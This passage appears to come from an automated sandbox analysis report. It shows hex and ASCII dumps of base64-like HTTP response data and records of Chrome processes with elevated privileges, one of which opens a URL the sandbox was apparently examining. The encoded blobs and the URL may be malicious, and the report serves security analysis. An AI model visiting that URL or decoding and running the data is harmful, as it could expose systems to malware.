            2025-03-13 09:53:10 UTC101INData Raw: 6b 34 76 64 69 39 33 62 6b 6b 35 4f 46 42 4c 57 58 64 4f 64 55 52 56 61 6d 74 42 64 58 64 6a 56 6a 52 69 51 32 4e 59 4e 6d 39 44 5a 56 70 45 51 58 6f 35 52 6b 67 72 65 57 39 6f 55 6b 67 77 57 47 5a 32 51 54 5a 59 65 56 5a 32 56 6b 73 79 61 57 4a 73 54 54 46 79 56 6b 70 58 61 6e 6c 71 63 58 56 4c 0d 0a
            Data Ascii: k4vdi93bkk5OFBLWXdOdURVamtBdXdjVjRiQ2NYNm9DZVpEQXo5RkgreW9oUkgwWGZ2QTZYeVZ2VksyaWJsTTFyVkpXanlqcXVL
            2025-03-13 09:53:10 UTC89INData Raw: 35 33 0d 0a 65 55 4e 53 5a 6a 4a 72 59 32 56 55 62 32 6f 34 53 53 39 33 64 6b 39 78 5a 48 52 4b 63 33 52 57 64 54 64 49 5a 6b 6c 58 5a 6d 35 50 52 6e 5a 58 57 54 64 57 51 32 46 30 56 54 64 4b 4f 56 68 47 51 30 35 51 59 55 52 76 63 58 49 78 56 32 70 33 61 45 31 0d 0a
            Data Ascii: 53eUNSZjJrY2VUb2o4SS93dk9xZHRKc3RWdTdIZklXZm5PRnZXWTdWQ2F0VTdKOVhGQ05QYURvcXIxV2p3aE1
            2025-03-13 09:53:10 UTC1378INData Raw: 61 61 35 0d 0a 43 65 58 46 35 5a 6d 64 30 62 6b 68 6c 55 32 5a 54 59 6c 70 57 62 33 68 75 52 58 6c 4b 53 47 64 79 5a 32 64 4b 54 44 4a 72 4e 7a 63 35 61 32 6c 50 56 31 4e 45 56 46 70 59 4d 47 6c 33 64 31 52 48 62 30 45 33 51 30 4a 6a 59 6b 52 49 4d 7a 4a 71 63 55 78 70 57 47 4a 59 5a 45 63 7a 55 6b 6c 77 59 6e 41 76 51 6b 4a 48 5a 44 5a 34 56 55 63 77 64 33 70 45 4d 45 4a 70 61 6a 52 46 56 31 5a 76 64 6c 6b 78 4d 48 4e 6d 52 6b 52 74 53 6e 64 44 4d 57 6c 48 4f 47 64 6d 52 54 64 4b 52 54 5a 61 62 30 6c 75 51 30 52 57 51 6e 59 32 4e 58 42 6b 55 6d 46 47 51 30 78 74 4e 43 74 42 5a 33 56 69 4f 54 4a 54 55 54 52 6c 51 57 70 31 4e 57 4e 44 59 6d 64 75 55 57 74 4b 63 53 74 6e 4e 45 39 4e 61 6c 4e 4c 61 32 64 76 59 6e 4a 53 4e 53 39 53 52 48 56 72 54 55 31 4a 54
            Data Ascii: aa5CeXF5Zmd0bkhlU2ZTYlpWb3huRXlKSGdyZ2dKTDJrNzc5a2lPV1NEVFpYMGl3d1RHb0E3Q0JjYkRIMzJqcUxpWGJYZEczUklwYnAvQkJHZDZ4VUcwd3pEMEJpajRFV1ZvdlkxMHNmRkRtSndDMWlHOGdmRTdKRTZab0luQ0RWQnY2NXBkUmFGQ0xtNCtBZ3ViOTJTUTRlQWp1NWNDYmduUWtKcStnNE9NalNLa2dvYnJSNS9SRHVrTU1JT
            2025-03-13 09:53:10 UTC1354INData Raw: 65 48 56 30 64 32 4e 6c 62 6a 42 30 4e 54 6c 31 52 32 5a 34 52 6c 52 6a 61 6e 4a 59 55 45 49 79 4b 32 5a 78 57 47 68 70 56 31 5a 32 65 55 39 74 61 47 35 33 4b 7a 46 4b 53 30 68 61 63 30 70 55 4e 6a 56 74 55 48 4e 6a 55 54 4a 30 61 47 56 6e 52 6e 5a 61 61 57 78 4d 59 33 4d 33 4d 6a 4a 75 57 45 78 30 64 55 68 4d 56 46 42 46 63 6b 4e 6c 57 6c 4e 33 64 55 34 79 65 6c 4a 59 54 47 74 75 5a 33 70 68 59 7a 6c 4f 4d 6a 42 35 51 6b 46 33 62 46 6f 72 64 6b 70 47 56 33 4a 6e 5a 30 78 4e 62 55 31 79 4f 45 52 49 56 45 34 33 62 47 52 30 62 45 74 48 63 45 74 6c 61 33 56 47 53 6e 42 6c 55 7a 56 35 4c 31 70 61 4f 47 30 35 5a 6e 59 76 4e 30 39 36 4d 45 5a 77 65 6d 4a 4e 63 6b 4e 4d 53 31 63 31 5a 6c 41 30 57 6b 52 51 51 6a 49 72 62 45 56 4a 63 44 46 50 63 45 4e 56 5a 54 68
            Data Ascii: eHV0d2NlbjB0NTl1R2Z4RlRjanJYUEIyK2ZxWGhpV1Z2eU9taG53KzFKS0hac0pUNjVtUHNjUTJ0aGVnRnZaaWxMY3M3MjJuWEx0dUhMVFBFckNlWlN3dU4yelJYTGtuZ3phYzlOMjB5QkF3bFordkpGV3JnZ0xNbU1yOERIVE43bGR0bEtHcEtla3VGSnBlUzV5L1paOG05ZnYvN096MEZwemJNckNMS1c1ZlA0WkRQQjIrbEVJcDFPcENVZTh
            2025-03-13 09:53:10 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Click to jump to process

            Click to jump to process

            Click to jump to process

            Target ID:1
            Start time:05:52:51
            Start date:13/03/2025
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Imagebase:0x7ff786830000
            File size:3'388'000 bytes
            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:2
            Start time:05:52:55
            Start date:13/03/2025
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,17615637402213237854,2665322888663508983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2268 /prefetch:3
            Imagebase:0x7ff786830000
            File size:3'388'000 bytes
            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Target ID:7
            Start time:05:53:01
            Start date:13/03/2025
            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://szrjxkj.com/dongtai/8622.html"
            Imagebase:0x7ff786830000
            File size:3'388'000 bytes
            MD5 hash:E81F54E6C1129887AEA47E7D092680BF
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            No disassembly